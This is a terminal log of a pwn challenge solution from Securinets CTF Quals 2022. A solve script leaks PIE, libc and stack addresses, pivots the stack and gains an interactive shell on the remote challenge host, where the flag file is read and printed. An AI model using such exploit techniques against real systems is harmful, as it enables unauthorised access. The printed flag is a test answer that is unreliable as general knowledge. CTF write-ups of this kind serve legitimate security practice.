mito@ubuntu:~/CTF/Securinets_CTF_Quals_2022/Pwn_FTP$ python solve.py r
[*] '/home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/ftp'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 20.216.39.14 on port 1234: Done
[*] '/home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/libc6_2.31-0ubuntu9.7_i386.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
pie_leak = 0x5659718c
pie_base = 0x56595000
puts_addr   = 0xf7aadc30
libc_base   = 0xf7a40000
stack_pivot = 0xf7b33357
stacks_leak = 0xffae5e7c
[*] Switching to interactive mode

id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls -l
total 48
-rw-rw-r-- 1 root root    61 Apr  9 03:09 flag.txt
-rw-r--r-- 1 ctf  ctf     60 Apr 10 01:12 note
-rwsrwxr-x 1 root ctf  16860 Apr  9 02:30 task4
-rwxrwxr-x 1 root root 18744 Apr  9 02:30 ynetd
$ cat flag.txt
Securinets{b554948c19c146bb98c8567b97bd9e111c9a1a3be03a94f1}

